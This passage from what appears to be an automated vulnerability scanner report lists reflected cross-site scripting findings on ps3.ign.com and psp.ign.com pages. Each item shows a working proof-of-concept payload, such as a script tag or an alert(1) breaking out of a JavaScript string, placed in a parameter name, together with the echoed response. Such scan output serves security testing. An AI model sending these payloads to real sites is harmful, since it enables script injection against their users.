Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/previews.html?fa52e"-alert(1)-"4aeaced405c=1 HTTP/1.1 Host: ps3.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN PS3: Games, Ch ...[SNIP]... peof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://ps3.ign.com/index/previews.html?fa52e"-alert(1)-"4aeaced405c=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.387. http://ps3.ign.com/index/previews.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ps3.ign.com
Path:
/index/previews.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6402"><script>alert(1)</script>01905e7bb75 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/previews.html?c6402"><script>alert(1)</script>01905e7bb75=1 HTTP/1.1 Host: ps3.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.388. http://ps3.ign.com/index/psn-games.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ps3.ign.com
Path:
/index/psn-games.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b232"><script>alert(1)</script>9d4448b2e18 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/psn-games.html?1b232"><script>alert(1)</script>9d4448b2e18=1 HTTP/1.1 Host: ps3.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>All PlayStation Ne ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://ps3.ign.com/index/psn-games.html?1b232"><script>alert(1)</script>9d4448b2e18=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.389. http://ps3.ign.com/index/psn-games.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ps3.ign.com
Path:
/index/psn-games.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload acf2c"-alert(1)-"6bb90e049a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/psn-games.html?acf2c"-alert(1)-"6bb90e049a0=1 HTTP/1.1 Host: ps3.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>All PlayStation Ne ...[SNIP]... eof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://ps3.ign.com/index/psn-games.html?acf2c"-alert(1)-"6bb90e049a0=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.390. http://ps3.ign.com/index/psn-reviews.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ps3.ign.com
Path:
/index/psn-reviews.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e61b"-alert(1)-"1978262332b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/psn-reviews.html?8e61b"-alert(1)-"1978262332b=1 HTTP/1.1 Host: ps3.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>PSN Game Reviews, ...[SNIP]... f _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://ps3.ign.com/index/psn-reviews.html?8e61b"-alert(1)-"1978262332b=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.391. http://ps3.ign.com/index/psn-reviews.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ps3.ign.com
Path:
/index/psn-reviews.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 333d2"><script>alert(1)</script>5af7dbe7709 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/psn-reviews.html?333d2"><script>alert(1)</script>5af7dbe7709=1 HTTP/1.1 Host: ps3.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>PSN Game Reviews, ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://ps3.ign.com/index/psn-reviews.html?333d2"><script>alert(1)</script>5af7dbe7709=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.392. http://ps3.ign.com/index/psn-upcoming.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ps3.ign.com
Path:
/index/psn-upcoming.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6b7e"-alert(1)-"eda54c92041 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/psn-upcoming.html?e6b7e"-alert(1)-"eda54c92041=1 HTTP/1.1 Host: ps3.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>New PSN Games, The ...[SNIP]... _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://ps3.ign.com/index/psn-upcoming.html?e6b7e"-alert(1)-"eda54c92041=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.393. http://ps3.ign.com/index/psn-upcoming.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ps3.ign.com
Path:
/index/psn-upcoming.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ba1d"><script>alert(1)</script>efb3e24d774 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/psn-upcoming.html?1ba1d"><script>alert(1)</script>efb3e24d774=1 HTTP/1.1 Host: ps3.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>New PSN Games, The ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://ps3.ign.com/index/psn-upcoming.html?1ba1d"><script>alert(1)</script>efb3e24d774=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.394. http://ps3.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ps3.ign.com
Path:
/index/reviews.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e390"><script>alert(1)</script>f29ee9234aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/reviews.html?1e390"><script>alert(1)</script>f29ee9234aa=1 HTTP/1.1 Host: ps3.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>New PlayStation 3 ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://ps3.ign.com/index/reviews.html?1e390"><script>alert(1)</script>f29ee9234aa=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.395. http://ps3.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ps3.ign.com
Path:
/index/reviews.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f8a1"-alert(1)-"a0d00978690 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/reviews.html?5f8a1"-alert(1)-"a0d00978690=1 HTTP/1.1 Host: ps3.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>New PlayStation 3 ...[SNIP]... ypeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://ps3.ign.com/index/reviews.html?5f8a1"-alert(1)-"a0d00978690=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.396. http://ps3.ign.com/index/upcoming.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ps3.ign.com
Path:
/index/upcoming.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7621b"><script>alert(1)</script>99eee11f49 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/upcoming.html?7621b"><script>alert(1)</script>99eee11f49=1 HTTP/1.1 Host: ps3.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>New PlayStation 3 ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://ps3.ign.com/index/upcoming.html?7621b"><script>alert(1)</script>99eee11f49=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.397. http://ps3.ign.com/index/upcoming.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ps3.ign.com
Path:
/index/upcoming.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 776ef"-alert(1)-"5b8197062dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/upcoming.html?776ef"-alert(1)-"5b8197062dd=1 HTTP/1.1 Host: ps3.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>New PlayStation 3 ...[SNIP]... peof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://ps3.ign.com/index/upcoming.html?776ef"-alert(1)-"5b8197062dd=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.398. http://ps3.ign.com/index/videos.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ps3.ign.com
Path:
/index/videos.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73753"><script>alert(1)</script>625518b1650 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/videos.html?73753"><script>alert(1)</script>625518b1650=1 HTTP/1.1 Host: ps3.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.399. http://ps3.ign.com/index/videos.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ps3.ign.com
Path:
/index/videos.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e6a6"-alert(1)-"830681dc7ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/videos.html?8e6a6"-alert(1)-"830681dc7ae=1 HTTP/1.1 Host: ps3.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN PS3: Games, Ch ...[SNIP]... typeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://ps3.ign.com/index/videos.html?8e6a6"-alert(1)-"830681dc7ae=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.400. http://ps3.ign.com/objects/142/14235018.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ps3.ign.com
Path:
/objects/142/14235018.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c085"-alert(1)-"df569643981 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /objects/142/14235018.html?8c085"-alert(1)-"df569643981=1 HTTP/1.1 Host: ps3.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN: Mass Effect 2 ...[SNIP]... comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://ps3.ign.com/objects/142/14235018.html?8c085"-alert(1)-"df569643981=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.401. http://ps3.ign.com/objects/142/14235018.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ps3.ign.com
Path:
/objects/142/14235018.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 246bf"><script>alert(1)</script>30de6eceb5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /objects/142/14235018.html?246bf"><script>alert(1)</script>30de6eceb5a=1 HTTP/1.1 Host: ps3.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN: Mass Effect 2 ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://ps3.ign.com/objects/142/14235018.html?246bf"><script>alert(1)</script>30de6eceb5a=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.402. http://ps3.ign.com/objects/143/14324403.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ps3.ign.com
Path:
/objects/143/14324403.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dc55"><script>alert(1)</script>3fe39be957d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /objects/143/14324403.html?9dc55"><script>alert(1)</script>3fe39be957d=1 HTTP/1.1 Host: ps3.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.403. http://ps3.ign.com/objects/143/14324403.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ps3.ign.com
Path:
/objects/143/14324403.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6131c"-alert(1)-"1c25f5dad70 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /objects/143/14324403.html?6131c"-alert(1)-"1c25f5dad70=1 HTTP/1.1 Host: ps3.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN: Killzone 3</t ...[SNIP]... comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://ps3.ign.com/objects/143/14324403.html?6131c"-alert(1)-"1c25f5dad70=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.404. http://ps3.ign.com/objects/143/14336698.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ps3.ign.com
Path:
/objects/143/14336698.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2829"><script>alert(1)</script>30bdea2ac62 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /objects/143/14336698.html?c2829"><script>alert(1)</script>30bdea2ac62=1 HTTP/1.1 Host: ps3.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.405. http://ps3.ign.com/objects/143/14336698.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ps3.ign.com
Path:
/objects/143/14336698.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed6a8"-alert(1)-"0486319f11c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /objects/143/14336698.html?ed6a8"-alert(1)-"0486319f11c=1 HTTP/1.1 Host: ps3.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN: Explodemon!</ ...[SNIP]... comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://ps3.ign.com/objects/143/14336698.html?ed6a8"-alert(1)-"0486319f11c=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.406. http://psp.ign.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://psp.ign.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fed0a"><script>alert(1)</script>909d278e2b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?fed0a"><script>alert(1)</script>909d278e2b3=1 HTTP/1.1 Host: psp.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>Sony PlayStation P ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://psp.ign.com/?fed0a"><script>alert(1)</script>909d278e2b3=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.407. http://psp.ign.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://psp.ign.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 569d8"-alert(1)-"d310445092f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?569d8"-alert(1)-"d310445092f=1 HTTP/1.1 Host: psp.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>Sony PlayStation P ...[SNIP]... <script> if(typeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://psp.ign.com/?569d8"-alert(1)-"d310445092f=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.408. http://psp.ign.com/index/features.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://psp.ign.com
Path:
/index/features.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb565"><script>alert(1)</script>7cee49060e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/features.html?fb565"><script>alert(1)</script>7cee49060e3=1 HTTP/1.1 Host: psp.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.409. http://psp.ign.com/index/features.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://psp.ign.com
Path:
/index/features.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8104e"-alert(1)-"f56fede6b07 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/features.html?8104e"-alert(1)-"f56fede6b07=1 HTTP/1.1 Host: psp.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>PSP & PSPgo Review ...[SNIP]... peof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://psp.ign.com/index/features.html?8104e"-alert(1)-"f56fede6b07=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.410. http://psp.ign.com/index/games.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://psp.ign.com
Path:
/index/games.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3e46"-alert(1)-"b63af14015c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
